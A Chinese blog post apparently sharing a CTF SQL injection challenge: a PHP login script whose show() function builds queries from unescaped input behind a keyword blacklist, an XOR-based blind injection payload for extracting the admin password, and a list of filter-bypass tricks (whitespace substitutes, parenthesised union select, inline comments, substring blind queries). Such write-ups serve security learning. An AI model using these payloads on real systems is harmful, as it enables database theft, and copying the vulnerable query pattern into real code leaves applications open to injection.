Sql False注入分享
文章地址:https://www.anquanke.com/post/id/86021
0x01 题目
<?php
include("config.php");
$conn ->query("set names utf8");
function randStr($lenth=32){
$strBase = "1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm";
$str = "";
while($lenth>0){
$str.=substr($strBase,rand(0,strlen($strBase)-1),1);
$lenth --;
}
return $str;
}
if($install){
$sql = "create table `user` (
`id` int(10) unsigned NOT NULL PRIMARY KEY AUTO_INCREMENT ,
`username` varchar(30) NOT NULL,
`passwd` varchar(32) NOT NULL,
`role` varchar(30) NOT NULL
)ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci ";
if($conn->query($sql)){
$sql = "insert into `user`(`username`,`passwd`,`role`) values ('admin','".md5(randStr())."','admin')";
$conn -> query($sql);
}
}
function filter($str){
$filter = "/ |\*|#|;|,|is|union|like|regexp|for|and|or|file|--|\||`|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%a0')."/i";
if(preg_match($filter,$str)){
die("you can't input this illegal char!");
}
return $str;
}
function show($username){
global $conn;
$sql = "select role from `user` where username ='".$username."'";
$res = $conn ->query($sql);
if($res->num_rows>0){
echo "$username is ".$res->fetch_assoc()['role'];
}else{
die("Don't have this user!");
}
}
function login($username,$passwd){
global $conn;
global $flag;
$username = trim(strtolower($username));
$passwd = trim(strtolower($passwd));
if($username == 'admin'){
die("you can't login this as admin!");
}
$sql = "select * from `user` where username='".$conn->escape_string($username)."' and passwd='".$conn->escape_string($passwd)."'";
$res = $conn ->query($sql);
if($res->num_rows>0){
if($res->fetch_assoc()['role'] === 'admin') exit($flag);
}else{
echo "sorry,username or passwd error!";
}
}
function source(){
highlight_file(__FILE__);
}
$username = isset($_POST['username'])?filter($_POST['username']):"";
$passwd = isset($_POST['passwd'])?filter($_POST['passwd']):"";
$action = isset($_GET['action'])?filter($_GET['action']):"source";
switch($action){
case "source": source(); break ;
case "login" : login($username,$passwd);break;
case "show" : show($username);break;
}
0x02 分析
username = “stringExample’^!(mid((passwd)from(-{pos}))=’{passwd}’)='1”
异或会使字符串都转为浮点型,都变为了0,由于0=0^0 -> 1^0 -> 1当然对于这个题并不一定利用这个,直接截取字符串作比较就可以,但是这里只是提供一种姿势,由于mysql的灵活,其花样也比较多还有就是构造的payload比较简短,例如’+’、’^’、’/4#这样只有三个字符便可以绕过登录
0x03 文章还提到了一些绕过的技巧
空格:%20, %09, %0a, %0b, %0c, %0d, %a0
还有一些可以利用括号或者注释 and,or:||,&& union select:
利用括号,'and(true)like(false)union(select(pass)from(users)),
方括号union [all|distinct] select pass from users#,
union%a0select pass from users,
或者内联注释union/&sort=/select pass from users# union:
子查询进行盲注and length((select pass from users having substr(pass,1,1)=‘a’))
having:and(select substr(group_concat(pass),1,1)from users)='a select … from(过滤代码如/SELECTs+[A-Za-z.]+s+FROM/i/i): select [all|distinct] pass from users selecttable_namefrominformation_schema . tables select pass as alias from users select pass aliasalias from users select passalias aliasfrom users select+pass%a0from(users) select,and,&:
0x04 总结
原文作者总结的很到位,推荐大家细品原文
地址:https://www.anquanke.com/post/id/86021
299
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
